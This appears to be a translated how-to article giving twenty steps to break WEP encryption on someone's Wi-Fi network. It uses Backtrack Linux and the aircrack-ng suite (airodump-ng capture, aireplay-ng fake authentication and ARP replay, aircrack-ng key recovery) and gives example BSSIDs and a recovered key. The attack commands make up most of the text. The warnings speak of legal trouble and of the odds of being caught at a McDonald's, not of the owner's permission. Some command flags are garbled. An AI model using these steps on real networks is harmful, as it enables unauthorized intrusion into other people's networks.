Trying to break any data encryption algorithm involves knowing a few things. First, you need to know that there is a data encryption scheme. Second, you need to know how the encryption algorithm works. Here's how to access a network protected by WEP encryption, using a program to intercept network packets.
Steps
Step 1. Use the Linux operating system
Only in this way will you be able to intercept (in jargon sniffing) packets in a wireless network protected by a WEP data encryption algorithm. Use a version of Linux that can be booted directly from CD.
Step 2. Get software to intercept network packets
A very common choice falls on using the Linux distribution 'Backtrack'. Download the ISO image and burn it to a CD / DVD.
Step 3. Launch Backtrack
Use the newly created CD / DVD.
Note: this operating system, to be used, does not need to be installed on the hard disk, this means that, once it is turned off, all data will be lost
Step 4. Select Startup Settings
A list of possible boot modes will appear, select the one you want and hit enter. In this example, the first menu option is chosen.
Step 5. Load the GUI via the command line
To do this type the command 'startx' and press enter.
Step 6. At the end of the loading of the graphical interface, start the 'Terminal' window by clicking on the relative icon located on the left side of the system tray
Step 7. Wait for the Linux Command Prompt window to appear
Step 8. View the type of network connection you are using
Type the command: 'airmon-ng' (without quotes). Information similar to that in the image below will appear on the screen and you should be able to locate a line that begins with the label 'wlan0'.
Step 9. Get all the information about the network you are connected to
Type the following command: 'airodump-ng wlan0' (without quotes). From the list of results, take note of three things in particular:
- BSSID
- Communication channel
- ESSID (Name of the wifi network)
-
Below is the information that appears in the results of the example:
- BSSID: 00: 17: 3F: 76: 36: 6E
- Communication channel: 1
- ESSID (Name of the wi-fi network): Suleman
Break WEP Encryption Step 10 Step 10. Type the following command
In this example the above information is used but, in the real case, you will need to use what you will get after running the commands of the previous steps, in your specific case. Type the command: 'airodump-ng -w wep -c 1 - bssid 00: 17: 3F: 76: 36: 6E wlan0' (without quotes).
Break WEP Encryption Step 11 Step 11. Run the command and let it work
Break WEP Encryption Step 12 Step 12. Open another Terminal window
Type the following command, obviously using your BSSID, your communication channel and your ESSID. Type: 'aireplay-ng -1 0 –a 00: 17: 3f: 76: 36: 6E wlan0' (without quotes).
Break WEP Encryption Step 13 Step 13. Open another Terminal window
Type the following command: 'aireplay-ng -3 –b 00: 17: 3f: 76: 36: 6e wlan0' (without quotes).
Break WEP Encryption Step 14 Step 14. Run the command and let it work
Break WEP Encryption Step 15 Step 15. Now move to the first open Terminal window
Break WEP Encryption Step 16 Step 16. Verify that the value of the '# Data' column, highlighted in the image, has reached the value 30000 or more
It may take from 15 minutes to an hour or more, depending on the strength of the wifi signal, the performance of the computer and the number of active connections on the wi-fi access point.
Break WEP Encryption Step 17 Step 17. Return to the third Terminal window, opened previously, and terminate the command execution with the key combination 'Ctrl + c'
Break WEP Encryption Step 18 Step 18. Type the command:
'dir' (without quotes). This way you will see the list of folders created during the decryption process.
Break WEP Encryption Step 19 Step 19. Use the '.cap' file
The example uses the following command: 'aircrack-ng wep-02.cap' (without quotes). Run it and let it work.
Break WEP Encryption Step 20 Step 20. At the end of the data decryption process, you should get the WEP password as a result, to access the wifi network
In the example it is {ADA2D18D2E}.
Advice
- Many sniffing programs, such as Wireshark (formerly known as Ethereal), Airsnort, and Kismet, also make the source code available online. You will need some programming experience, and Linux or Windows source code compilation, to use Airsnort or Kismet. The Wireshark program, on the other hand, comes with an automatic installer, although you can also download its source code if you wish.
- You will most likely find compiled versions of many of the programs you will need.
- Cyber security laws vary from state to state. Make sure you are fully informed about this and be ready and aware of having to deal with the consequences of actions such as breaching a secure computer network.
Warnings
- You will need a wireless network card that is compatible with the programs you are using.
- This information must be used with common sense. Misuse of these procedures can cause you serious legal problems.
- Always pay attention to the type of network you intend to breach. It might not be a good idea to walk into a McDonalds and attempt to hack into the store's wireless network. The chances of getting caught would increase exponentially.
